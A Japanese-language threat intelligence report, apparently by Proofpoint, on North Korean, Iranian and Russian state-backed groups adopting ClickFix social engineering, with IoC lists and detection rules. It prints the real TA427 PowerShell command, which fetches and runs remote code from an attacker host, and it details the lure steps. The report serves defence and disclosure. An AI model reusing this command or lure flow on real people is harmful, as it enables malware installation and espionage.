主な調査結果
- 主にサイバー犯罪 攻撃者に関連する技術として知られているClickFixソーシャルエンジニアリング技術ですが、プルーフポイントのリサーチャーは、複数のキャンペーンにおいて国家支援を受けた攻撃グループが初めてこの技術を使用していることを発見しました。2024年末から2025年初めにかけてのわずか3ヶ月の間に、北朝鮮、イラン、ロシアのグループが日常的な活動でClickFixのテクニックを使っているのが目撃されています。
- ClickFixの導入は、TA427、TA450、UNK_RemoteRogue、TA422のキャンペーンに革命をもたらすものではなく、既存の感染チェーンにおけるインストールと実行の段階を置き換えるものです。
- 現時点では、ClickFixの使用は一部の国家的支援を受けた攻撃グループに限られていますが、昨年来のサイバー犯罪やここ数ヶ月のスパイ活動においてClickFixの人気が高まっていることから、この手法が国家的支援を受けた攻撃グループによってより広くテストされたり、採用されたりするようになる可能性が高いと考えられます。
概要
脅威ランドスケープの主要なトレンドの一つは、戦術、技術、手順(TTPs)の流動性です。脅威アクターは、公開されている攻撃手法や他の脅威グループとの相互作用を通じて、TTPsを共有、模倣、盗用、採用、テストします。特に、国家支援型アクターは、サイバー犯罪者によって最初に開発・展開された技術を活用することがよくあります。例えば、北朝鮮の脅威アクターは政府のために暗号通貨を盗む目的で、サイバー犯罪から技術を模倣しています。また中国のグループはスパイ活動の一環としてマルウェアを配信するために、サイバー犯罪の感染チェーンを真似ています。
このトレンドの最新の例がClickFixです。ClickFixは、ターゲットのマシン上で悪意あるコマンドをコピー、ペースト、実行させるために、指示付きのダイアログボックスを使用するソーシャルエンジニアリング技術です。この独創的な技術は、偽のエラーメッセージを問題として提示するだけでなく、OSからの公式な警告と指示という形で解決策も提供します。主にサイバー犯罪活動で確認されたClickFix技術は、2024年3月初旬に初めて初期アクセスブローカーであるTA571とClearFakeクラスターによって使用され、その後、脅威ランドスケープに広がりました。
その1年後、少なくとも4つの国家支援型の脅威アクターが、通常のスパイ活動キャンペーンの一環として、この技術のバリエーションを試しています。2024年10月から2025年1月までのおよそ3ヶ月間に、北朝鮮、イラン、ロシアの3か国を起源とする脅威アクターが、感染チェーンの一部としてClickFixを組み込みました。
北朝鮮:TA427
2025年1月と2月に、プルーフポイントは初めてTA427のオペレーターがシンクタンク部門の5つ未満の組織を標的に、ClickFix技術を使った新たな感染チェーンを使用することを観察しました。TA427は、他のベンダがKimsukyまたはEmerald Sleetと呼ぶ活動と重複しています。
TA427は、従来から北朝鮮問題に取り組んでいる標的に対し、なりすましの送信者から会議のリクエストを送り、最初の接触を行いました。TA427がよく用いる手法のように、標的との短いやり取りを通じて信頼を築いた後、攻撃者が管理するウェブサイトへ誘導し、そこで標的にPowerShellコマンドを実行させました。一つの感染チェーンは追加のペイロード取得に失敗しましたが、別のケースでは、PowerShell、VBS、バッチスクリプトを実行する多段階のチェーンを経由し、最終的にはQuasarRATというサイバー犯罪活動でもよく見られる一般的なマルウェアが配信されました。
感染チェーンの概要は以下の図で示されています。
TA427のClickFix感染チェーン(チェーン1 - 実線、チェーン2 – 点線)
配信方法
2025年2月、TA427のオペレーターは日本の外交官になりすまし、標的に対してワシントンD.C.の日本大使館で駐米大使の山田重夫氏との会議を設定するよう依頼するメールを送りました。
無害な添付ファイル付きのTA427による最初の接触
メールには「Letter from Ambassador Cho Hyun-Dong.pdf」という無害な添付ファイルがあり、件名は「[Japanese Embassy] Meeting Request」でした。その後、標的の個人および業務用メールアカウントとのやり取りを経て、攻撃者は悪意のあるメールを追加で送りました。
悪意のある添付ファイルを含むTA427からの返信
攻撃者からの返信メールには標的の名前を含むタイトルのPDFファイルが添付されており、このPDFには、セキュアドライブであると偽装した動的DNSドメインのサブドメインを使用したランディングページへのリンクが含まれていました。
悪意あるリンクを含むPDF添付ファイルの誘導
ランディングページには「Questionnaire.pdf」という偽のPDFファイルがホストされていました。
偽のPDFをホストするランディングページ
標的がこの偽のPDFをダウンロードしようとすると、別のページにリダイレクトされました。ポップアップの警告が表示され、ドキュメントを見るためには登録が必要であると促しました。
「登録」ダイアログボックス
ユーザーが登録ボタンをクリックすると、以下に示すようにコードの入力を促す別のポップアップが表示され、登録方法の指示もありました。
コードとPowerShellコマンド実行指示が含まれるダイアログボックス
ユーザーは以下のように、登録コードとして表示されたPowerShellコマンドを手動でコピーし、ターミナルで実行する必要があります。
powershell -windowstyle hidden -Command iwr
"hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd" -OutFile
"$env:TEMP\p"; $c=Get-Content -Path "$env:TEMP\p" -Raw; iex
$c;
3Z5TY-76FR3-9G87H-7ZC56
ClickFixのPowerShellコマンドは、リモートでホストされた2つ目のPowerShellコマンドを取得し、実行します。このコマンドは、チェーンの前段階で言及した偽装用のPDF(Questionnaire.pdf)をユーザーに表示します。ドキュメントは日本の外務省からのものと称しており、北東アジアにおける核拡散および政策に関する質問が含まれていました。
偽装用のQuestionnaire.pdf
2つ目のPowerShellスクリプトは、temp.vbsというVBSスクリプトを作成し、「Update-out-of-date-20240324001883765674」という名前のスケジュールされたタスクによって19分ごとに実行されます。また、「Update-out-of-date-20240324001883765675」という2つ目のスケジュールされたタスクも作成され、20分ごとにVBSスクリプトを実行するよう設定されましたが、このVBSスクリプトは存在せず、このタスクの目的は不明です。
このチェーンではスケジュールされたタスクの実行以降は何も起きませんでしたが、2025年1月に観察された別のチェーンは類似の経路を辿り、追加の手順が含まれていました。このケースでは、最初のスケジュールされたタスクが最終的に2つのバッチスクリプトをダウンロードし、さらに2つの新しいPowerShellスクリプトと難読化されたペイロードを作成・デコードしました。
2つ目のバッチスクリプトは、新たに作成されたPowerShellスクリプトを実行し、最終的にBase64およびXORエンコードされたQuasarRATのペイロードをデコードしました。このペイロードは、コマンド&コントロール(C2)のIPアドレス38.180.157[.]197とポート80で通信を行いました。TA427は感染チェーンに新しい技術を採用しましたが、このグループは少なくとも4年間、一般に公開されているツールであるQuasarRATを使用しています。プルーフポイントは、この活動をインフラの重複、TTPs、マルウェアに基づきTA427によるものと特定しています。
ネットワークインフラの分析
配信インフラのさらなる調査により、非常に類似したテーマを持つ複数のサーバーやステージングURLが発見されました。また、プルーフポイントの研究者はTA427がこのキャンペーンで日本語、韓国語、英語のコンテンツを使用しており、送信者のなりすましに合わせてカスタマイズされていることを確認しました。以下は2025年1月中旬に観察された、韓国語でのセキュアドライブを偽装した例です。
2025年1月中旬の偽装されたセキュアドライブの例
TA427はこのキャンペーンで主に韓国にあるサーバー上でホストされた動的DNS(DDNS)サービスを使用しており、これらのサーバーはおそらく侵害されているとみられます。攻撃者は全てのケースでFreeDNSまたはNo-IP DDNSサービスを使用し、サブドメインとしてセキュアドライブまたはアカウントプロファイルを偽装していました。この活動に関連するインフラは、いずれも2025年1月以降に設置されたものです。
同じ月、マイクロソフトはTA427のClickFix感染チェーンのバリエーションを観察しました。このバリエーションでも、デバイスの登録とPowerShellコマンドの実行を促すURLが使用されていました。この場合、コードはブラウザベースのリモートデスクトップツールをインストールし、被害者のデバイスを登録するための証明書とPINをダウンロードしました。TA427は数週間にわたり複数のバージョンのClickFix技術を試行した後、すぐに以前からの実績ある技術に戻ったと考えられます。
イラン:TA450
2024年11月13日と14日、TA450は攻撃者が管理するメールアドレスsupport@microsoftonlines[.]comを使用し、中東の少なくとも39の組織のターゲットに英語のフィッシングメールを送信しました。TA450は、第三者がMuddyWaterやMango Sandstormと呼ぶグループと重複しています。このメールは、マイクロソフトからのセキュリティ・アップデートを装い、「Urgent Security Update Required – Immediate Action Needed(緊急のセキュリティアップデートが必要です - 即時の行動が必要です)」という件名で、セキュリティの脆弱性に対処するための一連の手順を実行するよう個人を説得しました。
攻撃者は、まずPowerShellを管理者権限で実行させ、次にメール本文に含まれるコマンドをコピーして実行させることで、ClickFixの手口を展開しました。このコマンドは、リモート管理・監視(RMM)ソフトウェア(この場合はLevel)をインストールするためのもので、その後、TA450のオペレーターはRMMツールを悪用してスパイ活動を行い、標的のマシンからデータを流出させます。
感染チェーンは以下の通りです:
TA450 ClickFix感染チェーン
11月15日、イスラエル国家サイバー局 は、攻撃者が特定のRMMツール, 「Level」をロードするコマンドを実行したと報告しました。プルーフポイントは、TA450が過去においてAtera、PDQ Connect、ScreenConnect、SimpleHelpなどの複数のRMMツールを侵入の足がかりとして使用してきたことを確認していますが、プルーフポイントのデータにおいてLevelが検出されたのはこれが初めてです。
TA450フィッシング(INCD)
このアトリビューションは、既知のTA450のTTP、キャンペーンの標的、およびマルウェア分析に基づいています。しかし、典型的なTA450 RMMキャンペーンが一貫してイスラエルの組織を標的としていたのに対し、同グループのClickFixキャンペーンはより広範囲に及んでいました。
以下のヒートマップに示されているように、プルーフポイントのリサーチャーは、TA450のターゲットが主に中東全域に分布していることを確認しています。
TA450によるClickFix キャンペーンのターゲットヒートマップ
標的は複数の業界に及んでいましたが、金融業界と政府機関が特に標的として人気がありました。
TA450 ClickFix ターゲットの業種別内訳
執筆時点において、2024年11月の最初の確認以降、TA450がClickFixを使用する追加の事例は確認されていません。ただし、TA450はその後数ヶ月間、イスラエルを標的とする典型的な行動パターンとRMM(リモート管理ツール)を活用した戦術を継続しています。
ロシア:UNK_RemoteRogue と TA422
北朝鮮とイランの国家機関は、ClickFixを実験している唯一の存在ではありません。UNK_RemoteRogueと特定された疑わしいロシアのグループも、2024年末に以下の感染チェーンでClickFixを使用していることが確認されました。
UNK_RemoteRogue ClickFix 感染チェーン
2024年12月9日から、主要な防衛産業の武器製造会社と関連する2つの組織の個人を対象に、侵害されたインフラストラクチャを利用して10件のメッセージが送信される標的型キャンペーンが実施されました。これらのメッセージには件名が含まれておらず、複数の侵害された可能性のあるZimbraサーバーを中間送信インフラとして悪用し、そのサーバーが「From」フィールドを埋めました。メールには、タイトル「RSVP Office - Створюйте, редагуйте документи та діліться ними в Інтернеті」でMicrosoft Officeを偽装した悪意のあるリンクが含まれていました。”:
hxxps://office[.]rsvp/fin?document=2hg6739jhngdf7892w0p93u4yh5g
リンクの説明文は「RSVP Office - オンラインでドキュメントを作成、編集、共有」と翻訳されました。ターゲットがリンクをクリックすると、Microsoft Word ドキュメントを偽装した HTML が表示され、ロシア語で書かれた ClickFix スタイルの指示が表示され、ブラウザからコードをターミナルにコピーするように促されました。ウェブページには、PowerShell を実行する方法に関する YouTube 動画チュートリアルへのリンクが含まれていました。
UNK_RemoteRogue ClickFix ランディングページが Microsoft Word を偽装している様子
ターミナルに貼り付けられたコマンドは、悪意のあるJavaScriptを実行し、その後、Empire C2フレームワークと関連付けられたPowerShellコードを実行しました。
プルーフポイントは、UNK_RemoteRogueがClickFixを使用したのは1回のみを確認し、その後、同グループは従来のキャンペーンに戻りました。これらのキャンペーンでは、侵害された中間メールサーバーの使用、同じアップストリーム送信ホスト、および非常に類似した標的選定など、多くの共通する特徴が確認されています。2025年1月、ドメインoffice[.]rsvpが5.231.4[.]94に解決され始め、このIPアドレスはukrtelcom[.]comとmail.ukrtelecom[.]euもホストしていました。これらのドメインは、同月に行われたUNK_RemoteRogueのフィッシング活動でも確認されました。DomainTools の調査 は、UNK_RemoteRogueの追加インフラストラクチャを指摘しています。
1月28日、UNK_RemoteRogueは、80.66.66[.]197をアップストリーム集約サーバーとして使用するキャンペーンで再出現し、侵害されたメールサーバーを中間送信者として継続的に悪用する同グループの傾向が確認されました。同グループは標的メールの『From』ヘッダーを偽造し、ウクライナの組織や通信・防衛企業を装い、RDPファイルを送信しました。2025年2月の後続キャンペーンでは、RDPファイルの配信を容易にするため、パスワード保護されたリンクが使用されました。
2025年1月に確認されたUNK_RemoteRogue フィッシングメール(RDP添付ファイル付き)
ターゲットのホストがリモート接続を許可している場合、ダウンロードされたファイルは、接続されたすべてのドライブを含むRDP接続を作成し、クリップボードデータとウェブ認証試行 をリモートホストにリダイレクトします。Proofpoint Threat Researchのクラウドデータ調査において、2025年2月下旬に、80.66.66[.]197のIPアドレスが、米国各州政府で勤務するユーザーのOffice 365 Exchangeアカウントへのログインを試行していることが確認されました。
ClickFixの新たな目撃情報が、2024年10月17日にロシアの確立されたグループから報告されました。CERT-UAは、TA422がGoogleスプレッドシートを模倣したリンクを含むフィッシングメールを送信するのを観測しました。TA422は、第三者がSofacyとAPT28と呼ぶ活動と重なっています。これにより、reCAPTCHAの提示が表示され、クリックするとPowerShellコマンドがコピー&ペーストされ、さらにコマンドを実行するよう指示するダイアログボックスが表示されました。PowerShellはSSHトンネルを作成し、Metasploitを実行します。
結論
国家が支援するアクターは、他のグループを観察し模倣することで、時には帰属の混乱という便利な副産物を伴いながら、創造的で独創的な手法を採用します。国家が支援するアクターがClickFixを使用する複数の事例は、この手法が国家アクターの間で人気を博しているだけでなく、異なる国々が数週間の差で同様の手法を採用していることを示しています。
以下のタイムラインは、国家支援型アクター(TA)のキャンペーンの典型的なペースの中で、各ClickFixの検出を示しています。ほとんどのケースでは、グループはClickFixキャンペーン後に標準的なキャンペーンに戻りました。TA422は例外で、追加のキャンペーンは観察されませんでした。ただし、これはProofpointの可視性の問題によるもので、その後の活動がないためではありません。
標準キャンペーンとClickFixの検出履歴(2024年7月~2025年3月)
他の一般的なキャンペーンが並行して継続している中、私たちは当初、この現象が国家支援型アクターがClickFix技術を試行段階にあるため、またはこの技術がマシン侵害において他の手法ほど成功しなかったためだと仮定していました。しかし、最近のプルーフポイントの調査では、グループが通常のキャンペーンを継続する中で、TA427は最初の検出から2ヶ月以上経った4月に、感染チェーンを若干変更した形でClickFixに戻ったことが判明しました。これは、TA427がClickFix技術の使用方法をさらに開発していることを示唆しており、今後数ヶ月間でさらなる事例が確認される可能性が高いと考えられます。
この技術は継続的に使用されているものではありませんが、北朝鮮、イラン、ロシアの脅威アクターがClickFixを試用またはテストした可能性があり、今後近い将来に利用する可能性もあります。この手法の世界的な拡散状況を踏まえると、Proofpointの調査において中国政府支援のアクターによるClickFixの使用が確認されていない点は目立つ特徴です。ただし、これは可視性の問題による可能性が高く、短期間で多くのアクターのキャンペーンに現れたことを考慮すると、中国関連グループがClickFixを実験的に使用した可能性は高いと考えられます。
IoC (Indicators of Compromise: 侵害指標)
特定のPDFのハッシュ値は、ターゲットにパーソナライズされていたため、インジケーターリストから除外されています。
|
TA427 Network Indicators |
|||
|
Indicator |
Type |
Description |
First Seen |
|
yasuyuki.ebata21@proton[.]me |
Email address |
Sender email |
February 2025 |
|
eunsoolim29@gmail[.]com |
Email address |
Sender email |
January 2025 |
|
115.92.4[.]123 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
121.179.161[.]230 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
121.179.161[.]231 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
172.86.111[.]75 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
210.179.30[.]213 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
221.144.93[.]250 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
118.194.228[.]184 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
14.34.85[.]86 |
IP |
Likely legitimate but compromised server |
January 2025 |
|
38.180.157[.]197 |
IP |
QuasarRAT C2 |
January 2025 |
|
securedrive.networkguru[.]com |
Domain |
Payload delivery |
January 2025 |
|
securedrive.servehttp[.]com |
Domain |
Payload delivery |
January 2025 |
|
securedrive-mofa.servehttp[.]com |
Domain |
Payload delivery |
January 2025 |
|
login-accounts.servehttp[.]com |
Domain |
Payload delivery |
January 2025 |
|
accounts-myservice.servepics[.]com |
Domain |
Payload delivery |
January 2025 |
|
securedrive.netsecgroup[.]com |
Domain |
Payload delivery |
January 2025 |
|
securedrive.privatedns[.]org |
Domain |
Payload delivery |
January 2025 |
|
drive.us-dos.securitel[.]com |
Domain |
Payload delivery |
March 2025 |
|
securedrive.fin-tech[.]com |
Domain |
Payload delivery |
January 2025 |
|
securedrive.opticalize[.]com |
Domain |
Payload delivery |
January 2025 |
|
securedrive.dob[.]jp |
Domain |
Payload delivery |
February 2025 |
|
accounts-porfile.serveirc[.]com |
Domain |
Payload delivery |
February 2025 |
|
account-profile.servepics[.]com |
Domain |
Payload delivery |
February 2025 |
|
freedrive.servehttp[.]com |
Domain |
Payload delivery |
March 2025 |
|
e-securedrive.mofa.mtomtech.co[.]kr |
Domain |
Payload delivery |
April 2025 |
|
securedrive.root[.]sx |
Domain |
Payload delivery |
February 2025 |
|
myaccounts-profile.servehttp[.]com |
Domain |
Payload delivery |
April 2025 |
|
undocs.myvnc[.]com |
Domain |
Payload delivery |
April 2025 |
|
undocs.servehttp[.]com |
Domain |
Payload delivery |
April 2025 |
|
raedom[.]store |
Domain |
C2 |
January 2025 |
|
hxxps://securedrive.root[.]sx:8443/us.emb-japan.go.jp/doc/eh |
URL |
Landing page |
February 2025 |
|
hxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/alert |
URL |
ClickFix pop-up |
February 2025 |
|
hxxps://securedrive[.]root[.]sx:8443/us.emb-japan.go.jp/doc/eh/register |
URL |
ClickFix pop-up |
February 2025 |
|
hxxps://securedrive.fin-tech[.]com/docs/en/ |
URL |
Landing page |
January 2025 |
|
hxxps://securedrive.fin-tech[.]com/docs/en/alert |
URL |
ClickFix pop-up |
January 2025 |
|
hxxps://securedrive.fin-tech[.]com/docs/en/register |
URL |
ClickFix pop-up |
January 2025 |
|
hxxps://securedrive.fin-tech[.]com/docs/en/t.vmd |
URL |
Hosting URL for PowerShell |
January 2025 |
|
hxxps://securedrive.fin-tech[.]com/docs/en/src/pdf_0.pdf |
URL |
Hosting URL for decoy PDF |
January 2025 |
|
hxxps://securedrive.fin-tech[.]com/docs/en/src/resp.php |
URL |
Redirect URL |
January 2025 |
|
hxxps://raedom[.]store/[REDACTED]/demo.php?ccs=cin |
URL |
VBS script C2 |
January 2025 |
|
hxxps://bit-albania[.]com/[REDACTED]/demo.php?ccs=cin |
URL |
VBS script C2 (compromised) |
February 2025 |
|
TA427 Malware Indicators |
|
|
|
|
|
Indicator |
Type |
Filename |
Description |
First Seen |
|
06816634fb019b6ed276d36f414f3b36f99b845ddd1015c2b84a34e0b8d7f083 |
SHA256 |
Letter from Ambassador Cho Hyun-Dong.pdf |
Lure document |
January 2025 |
|
0ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef83a716a97576e288f6dd |
SHA256 |
temp.vbs |
Stager script |
January 2025 |
|
18ee1393fc2b2c1d56d4d8f94efad583841cdf8766adb95d7f37299692d60d7d |
SHA256 |
temp.vbs |
Stager script |
February 2025 |
|
e410ffadb3f5b6ca82cece8bce4fb378a43c507e3ba127ef669dbb84e3c73e61 |
SHA256 |
1.bat |
Loader |
January 2025 |
|
78aa2335d3e656256c50f1f2c544b32713790857998068a5fa6dec1fb89aa411 |
SHA256 |
2.bat |
Loader |
January 2025 |
|
07a45c7a436258aa81ed2e770a233350784f5b05538da8a1d51d03c55d9c0875 |
SHA256 |
adobe.ps1 |
Dropper |
January 2025 |
|
f9536b1d798bee3af85b9700684b41da67ff9fed79aae018a47af085f75c9e3e |
SHA256 |
mer.ps1 |
Dropper |
January 2025 |
|
85db55aab78103f7c2d536ce79e923c5fd9af14a2683f8bf290993828bddeb50 |
SHA256 |
Unknown |
QuasarRAT |
January 2025 |
|
TA450 Network Indicators |
|||
|
Indicator |
Type |
Description |
First Seen |
|
support@microsoftonlines[.]com |
Email address |
Sender email |
November 2024 |
|
microsoftonlines[.]com |
Domain |
Phishing |
November 2024 |
|
UNK_RemoteRogue Network Indicators |
|||
|
Indicator |
Type |
Description |
First Seen |
|
office[.]rsvp |
Domain |
Email delivery |
December 2024 |
|
mail.ukrtelecom[.]eu |
Domain |
Phishing |
January 2025 |
|
ukrtelecom[.]eu |
Domain |
Phishing |
January 2025 |
|
ukrtelecom[.]com |
Domain |
Phishing |
January 2025 |
|
hxxps://office[.]rsvp/fin?document=2hg6739jhngdf7892w0p93u4yh5g |
URL |
Landing page |
December 2024 |
|
80.66.66[.]197 |
IP |
Email delivery |
December 2024 |
|
5.231.4[.]94 |
IP |
Email delivery |
January 2025 |
|
UNK_RemoteRogue Malware Indicators |
|||
|
Indicator |
Type |
Description |
First Seen |
|
bfb11abb82ab4c788156df862a5cf4fa085f1ac3203df7a46251373d55cc587c |
SHA256 |
HTML landing page |
December 2024 |
|
8a8c57eedca1bd03308198a87cae7977d3c385f240c5c62ac7c602126a1a312f |
SHA256 |
JavaScript executes PowerShell |
December 2024 |
ET rules
2061585 - ET MALWARE Observed DNS Query to TA450 Domain (microsoftonlines .com)
2061586 - ET MALWARE Observed TA450 Domain in TLS SNI
2061587 - ET MALWARE Observed DNS Query to UNK_RemoteRogue Domain
2061588 - ET MALWARE Observed DNS Query to UNK_RemoteRogue Domain
2061589 - ET MALWARE Observed DNS Query to UNK_RemoteRogue Domain
2061590 - ET MALWARE Observed UNK_RemoteRogue Domain in TLS SNI
2061591 - ET MALWARE Observed UNK_RemoteRogue Domain in TLS SNI
2061592 - ET MALWARE Observed UNK_RemoteRogue Domain in TLS SNI
2061593 - ET MALWARE Observed DNS Query to TA427 Domain
2061594 - ET MALWARE Observed TA427 Domain in TLS SNI
